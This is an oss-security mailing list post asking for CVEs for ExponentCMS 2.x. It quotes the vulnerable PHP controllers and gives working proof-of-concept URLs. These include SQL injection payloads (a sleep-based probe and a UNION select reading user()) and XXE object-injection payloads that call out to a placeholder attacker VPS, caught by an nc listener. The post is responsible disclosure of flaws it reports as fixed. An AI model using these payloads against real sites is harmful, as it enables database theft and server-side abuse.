'[oss-security] CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities
From:       Carl Peng <felixk3y () gmail ! com>
Date:       2016-09-30 4:22:38
Message-ID: CAEiFw0WzL4iVgrZYJsoizHbX8_s+tgGc4xJDnYgr1y4SVv=UrA () mail ! gmail ! com
[Download RAW message or body]


hello,
I reported the following vulnerabilities to the ExponentCMS team some days
ago, and now has been fixed.

1) sqli-1
/framework/modules/ecommerce/controllers/cartController.php
lines 61 - 66:
```
$product_type = isset($this->params['product_type']) ?
$this->params['product_type'] : 'product';
$product      = new product();
//if we're trying to add a parent product ONLY, then we redirect to it's
show view
$c = new stdClass();
if (isset($this->params['product_id']) && empty($this->params['children']))
$c = $product->find('first', 'parent_id=' . $this->params['product_id']);
//sqli
if (!empty($c->id)) {
flash('message', gt("Please select a product and quantity from the options
listed below to add to your cart."));
redirect_to(array('controller'=> 'store', 'action'=> 'show', 'id'=>
$this->params['product_id']));
}
```
the parameter of "product_id" fail to filtered, we can input
"product_id=sqli" to execute SQL statements.
Proof of concept:
/index.php?controller=cart&action=addItem&product_id=-1/**/and/**/1=if(1,sleep(1),0)%23

2) sqli-2
/framework/modules/help/controllers/helpController.php
lines 122 - 131:
```
if (empty($this->params['version']) || $this->params['version'] ==
'current') {
            $version_id = help_version::getCurrentHelpVersionId();
   } else {
            $version_id =
help_version::getHelpVersionId($this->params['version']); //sqli
            if (empty($version_id)) {
                $version_id = help_version::getCurrentHelpVersionId();
            }
   }
   $doc = $help->find('first', 'help_version_id='.$version_id.' AND
sef_url="'.$this->params['title'].'"'); //sqli
        $children = $help->find('count','parent='.$doc->id);
```
The parameters of "version" and "title" fail to filtered, we can input
"version=sqli" or "title=sqli"to execute SQL statements.
Proof of concept:
/index.php?controller=help&action=show&version=1" union select
1%23&title=aaa" union select
1,user(),3,4,5,6,7,8,9,0,11,12,1,2,3,4,5,6,7,8,9,0,11,12%23

3) Object Injection -1
/framework/modules/core/controllers/expTagController.php#L228-L232
```
foreach ($this->params['change_tag'] as $item) { // $item from user input
    $params['expTag'] = array();
    $classname = $this->params['mod'];
    $object = new $classname($item); // $classname also from user input
    expTag::deleteTag($this->params['mod'], $object->id);
    //...
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expTag&action=change_tags&mod=SimpleXMLElement&change_tag[]=%3C!DOCTYPE%20 \
root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fvps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E


4) Object Injection -2
/framework/modules/core/controllers/expCatController.php#L175-L182
```
if (!empty($this->params['change_cat'])) {
foreach ($this->params['change_cat'] as $item) {
$classname = $this->params['mod'];
$object = new $classname($item);
$params['expCat'][0] = $this->params['newcat'];
$object->update($params);
}
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expCat&action=change_cats&mod=SimpleXMLElement&change_cat[]=%3C!DOCTYPE%20 \
root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fyour_vps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E


[root@cloud ~]# nc -lvvp 8080
Listening on any address 8080 (webcache)
Connection from 8.8.8.8:63017
GET /xxe_exists HTTP/1.0
Host: your_vps_ip:8080


And now, all vulnerabilities have been fixed.
https://github.com/exponentcms/exponent-cms/commit/99636b2118cd9af4eb9920f6b6c228bd824593d2
https://github.com/exponentcms/exponent-cms/commit/fdafb5ec97838e4edbd685f587f28d3174ebb3db

these issues was reported by Peng Hua of silence.com.cn Inc. and I would
like to request CVEs for these issues (if not done so).

-------------------http://www.silence.com.cn/
penghua@silence.com.cn
PKAV Team



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic